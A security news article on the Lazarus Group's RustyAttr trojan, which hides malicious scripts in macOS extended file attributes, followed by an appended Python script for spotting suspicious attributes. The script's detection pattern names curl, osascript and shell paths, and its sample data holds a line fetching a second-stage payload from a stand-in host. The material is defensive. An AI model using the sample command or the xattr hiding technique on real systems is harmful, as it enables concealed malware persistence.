The Lazarus Group is abusing extended file attributes (xattr) on Unix-like systems to embed malicious data within system files without modifying the file's visible content; the technique, and the trojan built around it, has been dubbed RustyAttr.
This lets the threat actors evade conventional detection methods and maintain a long-lasting foothold on compromised systems.
The approach, not yet catalogued in the MITRE ATT&CK Framework, highlights the evolving tactics of advanced threat groups and underscores the need for enhanced security measures to counter such attacks.
xattr, or extended attributes, is a feature that allows users to store additional metadata on files in Unix-like systems, which is separate from standard file attributes like size and modification time.
It can be used to store custom tags, system-specific information, or even binary data. On macOS, xattr is used for various purposes, including storing Finder tags, quarantine flags, and Spotlight metadata.
While beneficial for system functionality, it can also be exploited by attackers to hide malicious data within files. Because an extended attribute lives in the file's metadata rather than its content, a file can carry hidden information that standard file inspection (viewing or hashing the file's contents) never shows.
The `xattr` command is used to manage extended attributes on files. To list the names of all extended attributes on a file named `secretfile.txt`, a user can execute `xattr secretfile.txt`.
To see the attributes of `secret.txt` together with their values, including a hidden attribute named `com.example.hidden_data`, a user can run `xattr -l secret.txt`, and to remove that attribute they can run `xattr -d com.example.hidden_data secret.txt`.
Researchers at Denwp discovered that the Lazarus Group is using extended attributes (xattr) to hide malicious code on macOS systems through a trojan named RustyAttr, written in Rust and built with the Tauri framework.
The trojan hides malicious code within custom xattrs of application files. Running `xattr` with the `-r` flag walks a directory, such as an application bundle, recursively, which surfaces the attributes set on the files inside it.
The `-p` flag prints the value stored in a named attribute; in this case, the attribute named "test" contained a malicious script that downloaded a PDF, opened it, and then fetched and executed a second-stage payload from a remote server.
Lazarus Group employed social engineering to distribute the RustyAttr trojan, a stealthy malware capable of executing malicious scripts from hidden file attributes. The trojan, initially signed with a certificate that has since been revoked, bypassed macOS security measures and fetched payloads from malicious domains linked to known threat actor infrastructure.
Much like Windows Alternate Data Streams, xattr lets attackers conceal critical data and payloads within file metadata; groups like Lazarus use it to evade traditional security solutions and retain persistent control of a system.
The absence of this technique from the MITRE ATT&CK Framework underscores the significance of the threat. To counter it, organizations should prioritize monitoring and securing extended file attributes so that such attacks can be identified and mitigated proactively.
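One way to put that monitoring recommendation into practice, as an added example that is not part of the original article or the Denwp research: a small Python triage script that flags extended attributes with unrecognised names, unusually large values, or script-like content, the three traits the "test" attribute described above would have shown. The allowlist of benign macOS attribute names, the size threshold, the marker patterns and the sample attributes are assumptions; the directory walk relies on `os.listxattr`/`os.getxattr`, which CPython provides on Linux.

```python
import os
import re

# Attribute names that are routine on macOS user files (assumed, illustrative allowlist, not exhaustive).
KNOWN_ATTRS = {
    "com.apple.quarantine",
    "com.apple.FinderInfo",
    "com.apple.metadata:_kMDItemUserTags",
    "com.apple.metadata:kMDItemWhereFroms",
}
# Byte patterns that suggest an attribute holds executable script text rather than metadata (assumed).
SCRIPT_MARKERS = re.compile(rb"#!/|\bcurl\b|\bosascript\b|/bin/(ba)?sh|\beval\b|\bbase64\b")
LARGE_VALUE = 4096  # bytes; tags and flags are small, embedded payloads are not (assumed threshold)

def triage_attribute(name: str, value: bytes) -> list:
    """Return the reasons one attribute looks suspicious; an empty list means it looks benign."""
    reasons = []
    if name not in KNOWN_ATTRS:
        reasons.append("unknown attribute name")
    if len(value) > LARGE_VALUE:
        reasons.append(f"large value ({len(value)} bytes)")
    if SCRIPT_MARKERS.search(value):
        reasons.append("script-like content")
    return reasons

def triage_file_attrs(attrs: dict) -> dict:
    """Triage every attribute of one file; the result maps flagged attribute names to their reasons."""
    return {n: r for n, v in attrs.items() if (r := triage_attribute(n, v))}

def scan_path(root: str) -> dict:
    """Walk a directory (e.g. an .app bundle) and triage the xattrs of every file; unreadable files are skipped."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            p = os.path.join(dirpath, f)
            try:
                attrs = {n: os.getxattr(p, n) for n in os.listxattr(p)}
            except OSError:
                continue
            if hits := triage_file_attrs(attrs):
                findings[p] = hits
    return findings

# Constructed sample mirroring the article: a normal quarantine flag next to a "test" attribute holding a script.
SAMPLE_ATTRS = {
    "com.apple.quarantine": b"0083;6641a3b0;Safari;",
    "test": b"#!/bin/bash\ncurl -s https://example.invalid/stage2 -o /tmp/stage2\n",
}
```

`triage_file_attrs(SAMPLE_ATTRS)` flags only `test` (unknown name, script-like content), while `scan_path("/path/to/Some.app")` applies the same triage to every file in a bundle.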